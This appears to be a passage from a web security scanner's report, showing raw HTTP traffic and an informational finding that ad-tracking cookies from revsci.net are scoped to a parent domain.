tU32B7+q0hZCsarOYUL5Qqt4HD5zctFUakMYCKNLuU58Vu0Y5jaiLe+2D5x69In9bkhvruS2v380SNEpf5JBLUF0UsgSyrb8SZUsFVBnCQz7podYm58A+PYHGpfwJjo8BJ1pEcK+39KU/V8qlF3czYQjVBMh5D3kw60Q1MaNZ06jJjhCdUiHRG2J4o/WKdmjurh9K2FQ41UexDSAIOxv2Gaj5B+DRmLckXKLc0IP7lV2qMc6F87RbtjjbqYCcRlS+1ZH6mGyDHaWyuRCm00rSJecxBBvf0OPGpaCt9rVDd5dC/apsRL18RnFeIEyp/3XM/Gc5Ad+fCgwcLqZQhNpb6Fxfn4q+D5YqrCgOvn6wVSbMsu1vuGHJmkjQrqwww9McBQBTyZQcfFJRejePaisI3pQASyehBE7EGo6WueN8TUdxTLZBZgJu4q7ylaocHjz3Yr2gGEohYG2D8NUJGQGY4tr2iWNO9B55kC6k+7phvae1BkP3V7IhltGq+ELTDsmYocV0YjzeXdSF/YD8e+YLB64MJcSTsig9Ldov8j7LyNfbPTQRF1NbfrSChWzM0cYu7WH82kA4CkLjOvAO5+XXThBqtKAwLVYsJReui/62jgOhOiO1SbxXRYvQgxUJG/2bwdGIx7xXGzYZxQrbm1Lgiq4sduZppPZJ+nHQ+jUO9TSAQqvBl6UErn8jCzQZMbe7MEhaqGO3sVg26k1sDHTMFugNKMbDnN0uiTvOQcy+YZ4SmONcbnTSJfNfN67BozcnNAf58eVd7rSAhG9q/tZkXUcqfkb0e3zx/7oyEKj7iyxN80Dr8ekHicYqp6nkydKw7W2L0yb5WDCn0+nz1vNALBSOlQg6z4gxabk3UTASDt6JqWJ9LhG0M7EJSG9GIUCKhh+Tn9QvE1nsV53rQsn5MFjFO/kVSzk/YVCbflod3UGhyrThMVAyqh/vec+xYJDvVaM+vjUDtFG8BGKdfF3Sux0ymaiZV6jOEckNKL4C73eZB/Y+bi9yHR+zjJEUKqTo9Dil9dLFzGGpLbt5+sM+I3yvcm8JAU2PiR745PmrLrVRU6EJyGuFH3tsRHMkw+hS2Uf+JnP113fUmTGhYLsXE4DR1HMD9ALfpUs0ymAJLmRxfquWg3yLE25bUXhK98K4A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k+huQIMTzaxu2F29/z4Oss1gLZjShnPT2/YPsJSum2Nh/Po4/dc2v9kDss6IjMts0PjmAyiPkvzZFbWhoYNWaeW+Yz6ayuyY8QpqLhIdHKAwUlBI+6iD3yXxwTKzfWBMz3kvMW7wrmG7H9vyAGJjwJyAcvhV4adQjTPEtazp/gW9ojmaM2fZiSgxO0hFnzZ7Y9aUs4uBNb/DQygvC6YBkUoo6pZype7eFDChF6wyqawbxiaqAFzltOxTOdqmRt9Sq1D0ZSc8D58jGzdzv7qT/bDeaOuIqgBSw2rKNR73SJfr00QjwCLB6JkEvzbrEOOLjHLrW8XnuZK9jUqV0QyIdN22WoxFcIoF5Ik6yzDT/lN5mGArFEKKd8ZVDijRfdJpAKDx6bQZwzbKMGh6XCCsjc4PTWhFQt5s8d1tCMge7w26rMOHNW5Muf/pH413A7x0JJ1kd94wczxR4jYglYfKSZf3KAURUb7I8SINPtk3LnwcK+E2kbksWp8FnyAnjlaaGrn1prsjsXyFBs0y2GLMCblCGAeSUnm7w0VBnmcoFxvSDFG/RAwNAcs488RQKg6W4AofHQdC8JNXhK8lhiI27Dd2Za/N3pt6lciisBp9w1COzQ8n+/U75gfmy5OGITOSxkZMjejXX0tktQ5AK4OzFAdYyCXyzx+yygziK4hVXa+jVGi8LuNTzSK+6W7PaKxnq098DKYkyAfwdiopZliO9bHnIw55IgVyMyuBk0TfaqXFses/V5xWSrRGjp4rdtKy8Ig0rrU8KPH4tPzqPcST8lGlnRvOC6+O0863E4TGK6XoKFir6RNEOgubeoQ+8Guak7YD/5C+CP1QYXVNbBK1NBE; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:53 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39yEJZjpv597JwHIRqQjgYATtJkLnfaG2qraMZB+wNcQAqiLCTArLHxzvFq5u+Lz+XZTpAGsSnAnIZ5EiYYU2Q5F27Lp3P4kg+B9zATNAQ3RqfX7tCLTk5AqN1ccbx5y4vf4L8AqfXp3YzxBdmO0SDwPtR4hxu4SvUtjRfPy1yofzFWJy8DjgpF9Vv7z4IwN/Glg2eAulkmXyJvHDxkHnDbCT0kvZ1s0/zvhv0RCqBEvF7tNIPnlACrrdjfPO3L8fl6lJV6fxQGDz4OojI+L45ARFGQP2xgjWQnVlIBDtC2AEV+GP5RjuCatHEuXXjaz/UTSZ2wGOPBof5+tBvFXIRZnO/C8sRTPYzxKuQL8w9GpVq6oxiVTh1QzRavI7tIK02zbdcd4VZqk7m7CEqealnEalVMP22Du9oN3j/qYDdfkRo1BVCH8V1yeu7O0FhqyJGhqO9YDJLCWqVG68JmEwAmMOVBaJzOVSgC9jW5w1fsopFgN5+ltD0t4CODq0kBbFsc/ap3Gysy/+xdi6BPYZc3NEhsdIF6SXp4UQnSjeh4vYQj9MHoyYeJto76Zy38QHU/MC9wTbVLI19s42MtegC+w8aF+UnIHBiOBIu39JZrWsGQHIqve2KC6PNaKhnPO8pLx7DtEh7p7QLYFSwAE5Q5GUu0tcTCh+sK+szx/GAAlvkW+Y+xA2r8mLGe/Zh43/E97HIZWSrbcGMUvxgV8USa2zw+6Hpkbx1RlDKxz+3wL08BYiiEoAjxeAgZOiaZ2O1PaQR4FEulJn+4PYQSlKywNeusxtOLE51lw+687pEoslxBiJjCFj1FW6D3YEY4yqsMpvW7H+XZvezzCI1kPcMJGN/0vaanxvfyEqb/57xhH9rQXTslfsxj8igUc1dm0O5tqa8yA5aJhul05zs6oBpxpnpxrLlaJKnh0K7cipFhaiEZmFxwZFLVr/w9hPQGFoBm5aCOREIqvTcjB86M4P2FwfCJe0hNEr98YtX5yxNqSq9FhH8aUluJXJRoOfNZIGqtM00dHxp7Ls0f8i4j2c5FxXHIGGxB9gjHMuY/sSTPyW8S2UBdUmEcZatMkyUSTILoY7EB8jfX941U9T+9Y9gKddqMnn3mP3obhIzhqnkt8049FSrgx8dKMU4OkmzU4RFmVwAanRHrhQPCc9oMLsEmukQ9FhxoHQhkfO3JSNtyWhjqgtXlL8Jsdi0y09iZVLB4fhRCg/s6iU3HRTQyIJu10b9r3Qe9dUxHeIrL5DdOiwHRvp+rJTg3+I8jSkEb2FYBbOPRMzb2ohh+pSSvZYrnxAer+LWWv0fCWg7C+jFlSMPeWL5PaznLW82Rt7bLCOdB8mnCSuLRGdmGcpZkG6cXcU3du5Ar7sQ6qj9VYLuohKqujYMBPl67iQmiyM9jEIbJkLmJ7XY/E4O8AWftxS2J+jJ3CMHZ/R9kVwxDtC2a40JiHw9SoSSiOZOuch+8nKU/C0fRXj27ULxSJoXwgKS1bpdqQu4mX1mmJxdznk6AET5MukVR3wTc2V0xpFgz+9wZa2PH3AKyd5yLOoWKQtpl+Cmtmkpi0KRwiCv88Zn4IiQGGQzr8q+NDKW9o+S3qSGoAZ0NAyrWTaUB/nHriAG7+xfHpPcA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:53 GMT

GIF89a.............!.......,...........D..;
8.58. http://pix04.revsci.net/D08734/a3/0/3/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a3/0/3/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a3/0/3/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Frl.com%253F&_rlcdnsegs= HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsiPus_F4VY="MLsXrrMO5Bpv55DW6taiZ2b5rkKgtP29EMOeggN9tKCDiZO6EZttNm2XYivlRGvJx3wq+AcA7TRrX4KAU1K7A+k+BucD/yILHav2qCKVvsYivSPZGUEU+aB9zLDLkrjAkqBHLQKUegX2AQBFFxs2/9Y9TpgT+5EDkLpB5AVp2M+IGst4lB+KF4CtQpkK5YTdVpUha7D+SX8DjJsBZM8wM32dh2TJ6U7yOSJalJGy2OINjHwRF0/X7yOvSnuds90sqBZje9Wr9kWO2iQn4L+ItzkYUx9f0BFaehTTaCpRkcmfar/cpmsz3/Rt+IkpB5CqybBmStcK8+NGk0skkxE5YTFMyCelZwsKUy8fRirZy0Fz0dFKNoKzyJluBxOO6eETgQZxpr/YeSKFo2RvryWsbKm8RH5Yh3IlqR+nYWfua1R7jJ6QGnx4WM/UOuDd9shsHL59RYkHV+/lw9JpahDWATy0yZlfazLyC2u2CJoppfMURxKIA/3jam9ZSgmhrr533InozG0Rsj5/UBjWKezexNxldhuwJdwhKNPl9p85rKWHBmjpla52OR6vY67ayH/gqa1JIaGf7CSYsPdlnzhf+u7f+CpnqmwlcOv9PVcFgPd4tafa0HGdPldmzRA5XY+Hsaxtq2yPeMcJVPHhcVoMZB0h3Tuem4cEJNDDBBmIBWmrsREKY7THr9PlLOCR4V2TMbJuxlF4N2FzJBQZykGOuXVAK8xYO2bQsswjq07nu2ETxzxpsDZtalA4elBHR4YY7QddOwOVF0LXYxs9QhsACxzGYie+ziZJcrtbFgsodfoYKM+kajPccoNoiW78ycwj6nivGmitgKZu9MKmacg4YVlY03UeUADPfutMyUtVS1wq1GHOPBfFrR0kIOJbSgZ9xhO0aZJVSvJuV49SBx5RXvaFtMTwJswlVgYXC4g16065gXVPuchoSFj3K+S8wActYQK/DIKBHfBjb/ev2/8pmYPG8taqCPkMfcQKupIGKr8TDfLCtguMlDo03wjJwPwk7kd+/MSDOLymwKKsf8oRqrItLFkbAU3F/ApFOsJbRXT7DsxYTtkHwF6sHllGu6Lzifu6FVcsDIeYnnPySPZXhCS85H2oUykxygt1b7i5aOGOuBcOTrXYgeScbQ3GWaQitLg3RoOsZZEYogBodyb3d4MdcFGQnbeKiEs2fyeAxCpg3KceiFBbbFNEPPFfWjJ2px4ZAHySRcW1gJ1LEml++zXq5EKllvOpwkyr2QeubD6yiYESQFDeMklVwbvFuULphCBvQsbvCk+xocxTvtHgwoRNqb6oDgNOpen2sOJ///1Yl0FFVuxNPD1Tp3kfzXxo+U8QK0WRFZbvd5ugerQRgJTKV0BcTxpNLUxM6yGwUeZymPUCP2b/KMoKRn/fQ7WJuczYg216QJ5mQr+0CPxRGnMwnlvsfheJVWDvjCE/NqYO"; rsi_us_1000000="pUMV4y9DPxYULWF0UBr2EFb5ofBLgcZpb/18uFL7SRGZRw8snkZOAxE7zS7H8JALWh1xIYKL2OZ1rJkKmhq+uW8FZZicGys92kgJzUyVvYczXwU63BAAzCO5a/Ue/ucli2qqZPDtihbQa5yaAmF8JtQyx/p7Inc8BlEfDReqXeKxKeb2blOovtcHtGU3G3NLbG9rAA+8UULrQ/nSOANRu+WyKjyhtkmsyLCzlahUWrBKfsEvHYkTlwHEyugQl9u11JF4gSkeXN0/ryuwj1UG0gMw3kqvmIlhRfQXfCzaPULrx+3zdYu0rNPMtPhjTDML9ymL/7QMckLC8lc3MDR7/MISYp+OAAZdw0RV1crYOE+3MyRdYJsFVBQoq2N18vfSdW3eory+NxYx/QaWelhhe+J+dHfzOr2IMhF5beDN0G7vKEiYasK5qJSXVhiyTItewSfEh2kMhEJg2GVfFWD+nIOlkEco8XoK8rcUZlB0wA33b2K2NKpPAuXZQJ+29sHEYTdKz+gnnveasa7G5+23g43yxoyWXo7QT4Ek2oXz3dJ95CDHRKabVhrt6NyRpdNhDPHK2DGr4eMqNbgdl55hWVMmLFnm7D6QXj1OdGcZNzAO182q2LXOApnqtkufNG/bomZat7BSgIy+u/RebOgQe7ws1R7LVqr7Z9ZyYISyWuR706WIzxvyJyvRQ225QNQyeO7Rm6zOnqtpJNr+Wl8dvuAXJnOF8cKvc68OZk64/Y9E4jDPRmGr+0x9uHLznY+lY+wXGh4+VwSWn14Bz1zY2w7n2zxQVw62gXPaEuZXtl/a9ICPgVNqYytupBKasgkwNh7wXQpySDJHwxV/n/j0XaJXXQzHVQzHoWnk8I6q06XIEId89mhMyBpc6k+LS+zntufcFexH/9uS12mcSH2n6HtKpEvbmBJQT/+qjmkBUply54nQ7lshdDSl1zth7EzAOhgRNGUi8vZ5YC6rQlT+ihN11HT3P6E4MA3XTebAGNEgJ4PdHrYX9ls0lFGP+QOnm16RInQK/KA53yKB/t4pzCsGdiei/OvLo3EbRQzJvygo4CdELrjrAoVqxoLwrF6YCdfp1f3adzWIfQxPuY67SlY+5YnwFKAMSKoiv2LM6+/JXLdYgYbqf/MSCoTBjD/T+6p0eYGx1W0q3Q+Squ/RFDRKA3hkcqVBsrWy3vyY0q/Mw9rzaHx5/40UoNLmNj4uhoJcV9JTmCwAFhhW6oSIYClB8ZEP3u3uhSpZRJzKVYgAutWdMNjYsXt3sCW5dMJnImphPACaDKHFX1/+gbeF2O2xlmUCRt/YCsqY0BzXYGyIU9ZFZAO3omI2SNKVkUfAYdTJl77lZ4kr67QARbiBk2rHkyQ1WiXt+QNLovV1ooc45d82JTRHOwIKgOx5yIo30DPC8M6gceM7Jz4lzefgOkbtbjiXyYhIm8CEKHbYEEZJapwXzfyOlfUljVLhZ8rMbzwXqVU49oKn6mmLTJTMAED9zKr9teWmAVy6A/ER3pcK5y3Ef03xSPuE2NFabbUC7sXriV2PB8zUkygEXtx5TLZrQfCk++okG0yb76XDSPjmgntZ1R4iV3Ch1vXbRUXxXz0SMai34OUEWwnSnF8aqr4m/XpwD/df250UCkj1oBJ1uCvP4zF7tLaLok03kDKKrOmzZydBGdOLVT1xfQz/K+IIEFzCj3coJjxzdOuMzbXVjGC0QP+vzmAVRPgTLWbAWZ3MpEgqZ/EeXWeITYMXjSfzWt2RzbLSDVnZIOU+6aceqIidIYqvbInejsid/R/BBvtAae+8+ymWAOYQ+kjG+NJLUtZa07yqTwCgKq8cHW51Z8l5lqGCN7Nrdg=="; rtc_t2EC=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; rsi_segs_1000000=pUPF4kmheXIQJvAtY6hK+mkCZPosg7ZjSjmgIGrY2pRiGzONZ94XQaTp/yWdxq+jjO/JAaatzgqqQQPzdZ6yqQR662XPvNKPv1Rqh9jA/v14pxLXAWEgoOqnGxC0L5lH0qtoLkyjOn5MHIKKOXRa+zdM/64ivKuCUdWRNaiwzQUZsPL4yqWFj8yeZiSgxO0hFnzZ/Y9aUs4uJNb/DQygvC6YBlUoo6pZype7eFDChF6wyqagbxiaqAFzltOxzOdqmZu3YLXJgph2RtT5HlfjivxZMS5K0tnPYc5QR/NXOs1ILOVOvIWigRJ0x5IhH1HhwuQSe9btcf0bCNcVP4HZi8O2AmX2Jc8Q5+6q+Q1E443mNe0zUVBMHyHjeZSEldrwPTCovX/zX0q4+NqSHWgzhVTqMsXrzxuir4UupXv4oyRzBvirDmCrPk2Y9JSPnsCzrtQ/Bb831pLYZiuXruqOg8rgXPDGVSSlkqg8lMb4AQplTZlqJ12NQm6l2Mr6kpmoZbk3l+9GGg4HvvsaymSSj4DYhOZpVvdYNhzZjgQ8yCrkQLuuptRfdpcxlr2fYtniFHQH/iCkkq3NECmZkuMBe8pDCAdn7nhoeOVxTfawTsncGe3PDqwvxHAHJRpePVGq032aL1/fakg1i70GnTPM+J5qEXnhcSTSJ9Ulk6xz0tSHuN/0Src41WHZpSkFcs/LpH/ROrAYGHeBuoyBr5VFqidpEYkdaaRRsqeTFjFJxouf1XDicU3ZtoMnr91x8D/697EdL0BlFyaGYfavzOacTjTqbVMbcSXglY/O1yL+oTBbldOIaAsX84GQL41KT9r9YX42ZNrvp6BWC8h/f4/1NnkBOEShvA==; udm_0=MLv39yEJZjpv597JwHIRqQjgYATtJkLnfaGGH+sXeVhoTqnXBF+Nd1a01tm80x2HLZWonp6/V2RHIlU34pHGe/rw5hHxIW3vVBdxt92l+vXlcmbnRIM/RrRkWwbT0ifun7uy9RztFswfjs+KV0iM4QczKvZEh3usGbMBmcJrufLfkPcAXtvzO++vSEin7/lQFDpbQSH7GZfD5vEp+tXTU7xMo6S3PMzDC/Z4+1qiZ1K+47dP5wseAL2HD5anm/bf2IyW0j8nfQMEeMMvVP/hTRZbrCiPom8hmJ/nl3NlzlqrZ4F1SDprjHiS+gYXKCqjfBEgUJo+55bYmIN2Vi/xnnIOiFiX3eAt71YVh/w83uBEVJW00dM5Q0ETrisxbtJIvOnCldc1I/9/QZKipfIWzloa/U+roRTBHVAqkWtHNekwVRJBqrL5B/mQPUoSEP78DniKkLh7Ds9XPBBbexdFIHFIfmpU6yYmGdVwFcueFD1S2wPw6wYVweqpy1xtADdnoLkMlKl7bq8tAlb4g3tHFY8rFeq1kYGPFPb5cv/YTZi/gy/jGuiA1s3yrGmJbvTi0mf2WCD8VbG011u0g6a4S184eRXYlWDTQn4vFgMs9L9CipeXlxmi5NmLRjvOeB+gku/TnXSA0WhoEy2qNdpbWyS1Ejok4rB3wsdkqYmp8C7jQMxjX8Zah8CbAVTljv3UZLiUqK34clxVHxPpozqFzmOtrMXQwZI6UGsFQTh6vihXry1FVIslnpJJ+fy6no609BNM29jCIchvgOiglzqPanPnDi4jQfviYBBmy7nzwxKgPVjwBLqPy6twjINqq+OfJNqjtwv/r5mAgJIYW/WMmejpYlichqhvICbuoyZ+9JdnXziTla+IlXyheLWx1a0jKTVqQJiaWJIuBt8L1kLG6KfvmUd919OTYHu7hKtTddmI/PmHs4jbVQQ+SbqEzVhEdFTvbVkH71M/t3izI2upipoP2Mo0v4wpHvNtIdKCxqZVbTtqCTlrr8HVi24ph6OaF+/RH0xMIFvr7j8pWmV534nlMJ7Yh/XMqUOgINXifYA4RXnj9qH4SEiZqVvlK0LrrBz/q8iEj+pzzRIv54IZLsOnxr/aNm4AY2zv+KN+t/YAUep+BCxakF1I+31Bf8RBcKO01w6B6wQ0lSvD5sfcBHWs5ZICGiZigNmqxngzlLvS78PxGGleIUBoYEYe//f2obKus2cI/PdSs0wCzEgF7LX/ub9Lu1zTLz0ZxPLSybIGU9nc3whHwAenW5HJ4HvB39Ok4iPTje85reavKAENWDRrHwFMXPU4aktzrsp8/z+OKbTy+dr34fbdoKvdDkdFs417FDGBOP1sAordIPxxRa9NXtbf0rIVozAT67DiE0yv306/1PEzEOpgro2Gf83lJk0rDBwcnDvJqM7rPNH6OMv8E4HG09jNnSsLWugAvKfPgv5ysEHWJz3pY9vyXxhHSMjjheRs/kBLhu8IM/dq/uRCbEAnXo6jzQk/45Cvi9Vjie0hnfkEt5cmGEHEWxyM9H28Dew1Z9IFFrBEGc4pu2TMUb+fTQ75RxDqV3zM1G9tQGISMJ3rrbJrjlrFg8QgEOGT3GVsq+U+sQvFFc1ra9aGn2y13m2Y

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_t2EC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4T+henIMH/C1v6FY5BBd22rQpqLhiqk7K1iol7fFqYeyPGROzsNp8jU3xj9gP1Bii2V/DBWvrpjBAy5DI8TAgLRReMSoKtfWOnTJm4rKExNlxnnCIEgnEzpZRgLGHztIAcOn4Kj3s8DlJ8eZre8Ul77CqmqUAVrVYHXu7N2xJU52T0yfauA9msUiV8ZlspgapDeLnplbVyF11jkhoPJUYxrxVENz/3cavxfxN5MVFr/q3pEI81eGG7OuiTpQruH3bMcDXgjl63mIzCytNXO4UVwy2rOL+Rc1IPdRaAZBuZhCCfPg1dG3SsLE1KxZL3dsJfg9j8MdMoAQkh5l00ljLMtdEAjmL24j1eG67Q8IOIi2phaT7iKeuSVaDKK8YdXrJdV8w6UZbFjULPW6glXfzf1g6VLOnuL37J14WhwAZuI73NvJMNhetrtpQtGM+RdsWwHvtXF6qF3l8F/+4VRNIxbpyu9HDRDbKR88Hqh/zokfrg4FxGILUOY6m7WL0/FBU2UnwdZGqqcBsTl6/y+CD1aVxirF71RHh7atWk0VHzMpUf1uikMher+6DCCUzSjsPq7StIuJDWDVv/eohzY+/6eb7cZVRB5SPlbW0Gk09/iGrMGoO2rFiHRggcj1Dzk5iCAONgC3WTANF/QHjyNSrICUZuk3Bxvl8pZKhuQMVEyf26k08eXVESj9CNtkUiTXKlXLJ3xn/dBLKr3iHqV+EgbKG/CfAl/zWL93eJCnXWEPLmi9q0W3+Z8N6eRH4WI2WrzpvNfhNp107U7zLC99LEl5dJqIz5sBpCtDQ6GosGQbA+wAxevKcwXBtvRPNwP0QgHjS3ow450/X7Q3YNC4FW6LKU4/99svgYzmk35W6Q==; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:59 GMT; Path=/
